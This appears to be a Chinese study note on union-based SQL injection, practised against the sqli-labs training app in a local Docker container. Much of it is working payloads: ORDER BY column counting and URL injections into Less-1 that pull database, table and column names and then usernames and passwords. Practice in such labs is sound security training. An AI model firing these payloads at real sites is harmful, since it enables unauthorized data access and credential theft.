1.2.1-SQL注入-SQL注入语法类型-union联合查询注入

SELECT column_name(s) FROM table_name1
UNION
SELECT column_name(s) FROM table_name2

SELECT column_name(s) FROM table_name1
UNION ALL
SELECT column_name(s) FROM table_name2

mysql> select * from users order by id union select 1,2,3;
错误 orderby 要在最后一个子句后面

mysql> select * from users limit 0,1 union select;
错误 limit 要在最后一个子句后面

docker run -dt --name sqli -p 90:80 --rm acgpiano/sqli-labs 
docker ps -a
docker exec -it <id> /bin/bash
mysql -uroot -p
show databases;
use security;

1. select * from users order by 4; // order by 判断多少列 从1～3 报错了确定有4列

2. select * from users where id=1 union select 1,2,3;
select * from users where id=-1 union select 1,(select version()),3;

3. select * from users where id=-1 union select 1,2,(select group_concat(schema_name) from information_schema.schemata);

4. select * from users where id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security'); // 当前库可以换成database() ''不识别可以换成十六进制0x

5. select * from users where id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users');

6. select * from users where id=-1 union select 1,2,(select group_concat(username,0x7e,password) from users);

http://127.0.0.1:90/Less-1/?id=1'
http://127.0.0.1:90/Less-1/?id=1' order by 1 --+ // 二分法试
http://127.0.0.1:90/Less-1/?id=-1' union select 1,2,3 --+
http://127.0.0.1:90/Less-1/?id=-1' union select 1,2,(version())--+ // user() database()

http://127.0.0.1:90/Less-1/?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+

http://127.0.0.1:90/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

http://127.0.0.1:90/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+

http://127.0.0.1:90/Less-1/?id=-1' union select 1,2,(select group_concat(username,0x7e,password) from users)--+